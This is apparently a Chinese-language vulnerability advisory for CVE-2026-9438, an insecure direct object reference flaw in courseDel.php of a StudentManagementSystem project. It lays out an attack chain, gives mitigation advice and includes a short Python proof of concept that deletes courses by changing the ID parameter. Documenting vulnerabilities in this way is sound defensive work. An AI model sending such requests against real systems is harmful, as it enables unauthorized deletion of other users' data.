CVE-2026-9438 CVSS 5.4 中危

CVE-2026-9438 StudentManagementSystem 资源标识符控制不当漏洞

披露日期: 2026-05-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-9438

漏洞类型

资源标识符控制不当

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

yashpokharna2555 StudentManagementSystem

漏洞概述

yashpokharna2555/StudentManagementSystem项目的courseDel.php文件存在资源标识符控制不当漏洞。由于系统未对用户请求的ID参数进行有效验证，攻击者可通过操纵该参数未授权地控制或删除系统资源。该漏洞可被远程利用，影响数据的完整性与可用性，目前已有公开的利用代码。

技术细节

该漏洞源于StudentManagementSystem在处理courseDel.php文件中的请求时，缺乏对用户输入参数'ID'的安全校验机制。应用程序直接将用户提供的ID值作为资源标识符用于后续的数据库操作或文件处理，而未验证当前用户是否具备操作该特定ID所对应资源的权限。这种设计缺陷属于典型的资源标识符控制不当（IDOR）问题。攻击者无需复杂的用户交互，仅需低权限即可发送恶意请求。由于项目采用滚动发布机制，具体受影响版本未明确披露，但已知特定提交（cb2f558d）存在此问题。攻击者可利用此漏洞遍历并删除非授权范围内的课程数据，导致服务中断和数据丢失。

攻击链分析

STEP 1

侦察与发现

攻击者识别目标运行的是StudentManagementSystem，并定位到存在漏洞的courseDel.php接口。

STEP 2

构造攻击请求

攻击者构造HTTP请求，修改其中的'ID'参数，将其指向非授权的资源标识符（如其他用户的课程ID）。

STEP 3

执行利用

向服务器发送恶意请求，服务器因缺乏权限验证而直接执行删除操作。

STEP 4

造成影响

目标资源被误删，系统数据完整性受损，正常业务可用性降低。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-9438
# The vulnerability allows deleting a course by manipulating the 'ID' parameter.

import requests

target_url = "http://target.com/courseDel.php"

# Attackers can change the 'ID' parameter to delete other resources
params = {
    "ID": "1"  # Try different IDs to impact other resources
}

response = requests.get(target_url, params=params)

if response.status_code == 200:
    print("Request sent successfully. Check if the resource was deleted.")
else:
    print(f"Request failed with status code: {response.status_code}")

影响范围

yashpokharna2555 StudentManagementSystem (Commit cb2f558ddf8d19396de0f92abf2d224d46a0a203)

防御指南

临时缓解措施

建议立即在受影响系统的courseDel.php文件中添加权限验证逻辑，确保只有资源拥有者或管理员才能执行删除操作。若无法立即修复，可暂时通过网络防火墙限制对courseDel.php的外部访问，或部署Web应用防火墙（WAF）检测并拦截针对ID参数的异常请求。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-9438
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-9438
3 Details https://www.cvedetails.com/cve/CVE-2026-9438/
4 VulDB https://vuldb.com/cve/CVE-2026-9438
5 Link https://github.com/yashpokharna2555/StudentManagementSystem/
6 Link https://github.com/yashpokharna2555/StudentManagementSystem/issues/1
7 Link https://vuldb.com/submit/813961
8 Link https://vuldb.com/vuln/365419
9 Link https://vuldb.com/vuln/365419/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表